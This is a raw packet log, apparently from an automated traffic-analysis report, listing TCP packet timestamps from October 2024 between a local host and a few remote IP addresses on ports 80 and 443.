                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.916368008 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.916380882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.916414976 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917071104 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917104959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917121887 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917155981 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917188883 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917210102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917224884 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917236090 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917258978 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917292118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917304993 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.917339087 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918025017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918060064 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918086052 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918092012 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918107033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918124914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918138027 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918159962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918194056 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918203115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918240070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918840885 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918893099 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918904066 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918926001 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918971062 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.918975115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919003963 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919038057 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919053078 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919070959 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919090986 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919112921 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919540882 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919575930 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919599056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919609070 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919655085 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919661999 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919687986 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919722080 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919738054 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919754982 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919789076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919790030 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919805050 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919822931 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919832945 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.919945955 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920452118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920485020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920514107 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920532942 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920547962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920566082 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920581102 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920592070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920614958 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920624018 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920648098 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920680046 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920681953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920696020 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920715094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920720100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.920895100 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921344042 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921377897 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921426058 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921456099 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921459913 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921483994 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921494961 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921509027 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921529055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921554089 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921561003 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921565056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921595097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921611071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921627998 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921637058 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921663046 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921672106 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.921708107 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922393084 CET4434990513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922425032 CET4434990513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922466993 CET4434990513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922615051 CET49905443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922674894 CET49905443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922674894 CET49905443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922714949 CET4434990513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.922739029 CET4434990513.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.925272942 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.925286055 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.925411940 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.925548077 CET49911443192.168.2.513.107.246.60
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.925559044 CET4434991113.107.246.60192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965260983 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965375900 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965442896 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965487957 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965497017 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965548992 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965583086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965594053 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:41.965629101 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036461115 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036526918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036562920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036624908 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036695004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036729097 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036781073 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036787033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036818027 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.036865950 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037189960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037224054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037256956 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037290096 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037312031 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.037338972 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038065910 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038139105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038166046 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038171053 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038211107 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038265944 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038300037 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038320065 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038332939 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038343906 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038367987 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038475990 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038779020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038822889 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038917065 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038950920 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038984060 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.038992882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039016962 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039037943 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039053917 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039062977 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039092064 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039606094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039638996 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039655924 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039680004 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039705038 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039714098 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039747953 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039781094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039794922 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039818048 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039822102 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.039946079 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040386915 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040420055 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040455103 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040469885 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040482998 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040502071 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040561914 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040671110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040700912 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040735006 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040770054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040777922 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040802002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040826082 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040837049 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040852070 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.040869951 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041131020 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041695118 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041729927 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041762114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041769981 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041795969 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041804075 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041830063 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041846991 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041862965 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041872025 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041896105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041903973 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.041929960 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042037964 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042676926 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042711020 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042721033 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042743921 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042789936 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042793989 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042823076 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042840958 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042855024 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042865992 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042885065 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042916059 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042948961 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042960882 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042982101 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.042992115 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043142080 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043596029 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043629885 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043663979 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043669939 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043697119 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043699980 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043730021 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043737888 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043764114 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043791056 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043797016 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043818951 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043829918 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.043839931 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044054031 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044565916 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044600964 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044619083 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044635057 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044646978 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044670105 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044676065 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044703007 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044715881 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044738054 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044770002 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044790030 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.044814110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088833094 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088867903 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088901997 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088915110 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088936090 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088942051 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.088968039 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089003086 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089037895 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089049101 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089072943 CET804987577.83.175.105192.168.2.5
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089088917 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.089124918 CET4987580192.168.2.577.83.175.105
                                                                                                                                                                                                                                                                                                                                Oct 28, 2024 22:02:42.155205011 CET4434990620.190.159.0192.168.2.5
